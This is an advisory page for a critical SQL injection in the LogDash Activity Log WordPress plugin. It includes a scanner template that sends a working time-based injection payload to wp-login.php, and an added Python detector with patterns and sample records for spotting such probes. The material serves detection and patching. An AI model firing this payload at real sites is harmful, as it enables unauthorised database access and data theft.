
LogDash Activity Log <= 1.1.3 - SQL Injection

CVE-2023-6030
Verified

Description

The LogDash Activity Log plugin for WordPress is vulnerable to SQL Injection via the username parameter in all versions up to, and including, 1.1.3 due to insufficient escaping on the user-supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries to already existing queries, which can be used to extract sensitive information from the database.

Severity

Critical

CVSS Score

9.8

Exploit Probability

0%

Published Date

February 24, 2026

Template Author

shivam kamboj

CVE-2023-6030.yaml
id: CVE-2023-6030

info:
  name: LogDash Activity Log <= 1.1.3 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The LogDash Activity Log plugin for WordPress is vulnerable to SQL Injection via the username parameter in all versions up to, and including, 1.1.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Unauthenticated attackers can exploit SQL injection to execute arbitrary SQL commands, potentially compromising the database.
  remediation: |
    Upgrade to version 1.1.4 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/logdash-activity-log/logdash-activity-log-113-unauthenticated-sql-injection
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6030
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-6030
    epss-score: 0.00403
    epss-percentile: 0.6106
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,logdash-activity-log

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/logdash-activity-log/README.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<= 1.1.3")'
          - 'contains(body, "LogDash Activity Log")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - 'Stable tag:\s*([0-9]+\.[0-9]+\.[0-9]+)'
        internal: true

  - raw:
      - |
        @timeout: 30s
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log=' OR (SELECT 1 FROM (SELECT(SLEEP(7)))YY) # a&pwd=test&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 490a00463044022078780f31143a2be61d551d108896520411568767b6ce393a5c1bfb9b7e180cca022016d335e06d59e63865639ce14f95826ee38eab546d37af1d37e96cfff5501d44:922c64590222798bb761d5b6d8e72950
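As an added, defender-side example that is not part of this advisory or of the plugin's code: a small Python checker that applies the same signal the template's second request relies on (a sleep-style function in the username plus an abnormally slow response) to login attempts recorded by a reverse proxy or WAF. It assumes such a log captures the request path, the form body and the response time in seconds; the records below are constructed, not real traffic.

```python
"""Flag time-based SQL injection probes against /wp-login.php in proxy/WAF records."""
import re
from urllib.parse import parse_qs

# Sleep-style functions used in time-based payloads (the template above uses SLEEP(7)).
SLEEP_PATTERN = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR\s+DELAY)\s*\(", re.IGNORECASE)
# A username that opens with a quote is trying to close a quoted SQL literal.
QUOTE_BREAKOUT = re.compile(r"^\s*['\"]")
SQL_KEYWORD = re.compile(r"\b(OR|AND|UNION|SELECT)\b", re.IGNORECASE)

# Constructed sample records: (request_path, form_body, response_seconds).
# Assumption: the proxy logs form bodies for /wp-login.php; this is not a real log format.
SAMPLE_RECORDS = [
    ("/wp-login.php", "log=alice&pwd=wrongpass&wp-submit=Log+In", 0.21),
    ("/wp-login.php",
     "log=%27+OR+%28SELECT+1+FROM+%28SELECT%28SLEEP%287%29%29%29YY%29+%23+a"
     "&pwd=test&wp-submit=Log+In", 7.43),
    ("/wp-login.php", "log=o%27brien&pwd=hunter2&wp-submit=Log+In", 0.19),
    ("/wp-admin/admin-ajax.php", "action=heartbeat", 0.05),
]


def inspect_login_attempt(path, body, seconds, delay_threshold=5.0):
    """Return the reasons a login POST looks like a SQLi probe ([] when it looks clean)."""
    if path != "/wp-login.php":
        return []
    # parse_qs decodes %XX escapes and '+' to space, so we inspect the decoded username.
    username = parse_qs(body, keep_blank_values=True).get("log", [""])[0]
    reasons = []
    if SLEEP_PATTERN.search(username):
        reasons.append("sleep-style function in username")
    if QUOTE_BREAKOUT.match(username) and SQL_KEYWORD.search(username):
        reasons.append("quote break-out followed by SQL keyword")
    # A delayed response on top of a suspicious username suggests the injected SQL ran.
    if reasons and seconds >= delay_threshold:
        reasons.append(f"response delayed {seconds:.1f}s (>= {delay_threshold}s)")
    return reasons


def scan_records(records, delay_threshold=5.0):
    """Map the index of each suspicious record to its list of reasons."""
    findings = {}
    for idx, (path, body, seconds) in enumerate(records):
        reasons = inspect_login_attempt(path, body, seconds, delay_threshold)
        if reasons:
            findings[idx] = reasons
    return findings


if __name__ == "__main__":
    for idx, reasons in scan_records(SAMPLE_RECORDS).items():
        print(f"record {idx}: {'; '.join(reasons)}")
```

Legitimate usernames containing an apostrophe (such as o'brien) are not flagged, because the check requires the quote to open the value and to be followed by a SQL keyword.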
Score

9.8

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
CVE-2023-6030
CWE ID:
CWE-89

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/logdash-activity-log/logdash-activity-log-113-unauthenticated-sql-injection
https://nvd.nist.gov/vuln/detail/CVE-2023-6030

Remediation Steps

Upgrade to version 1.1.4 or later.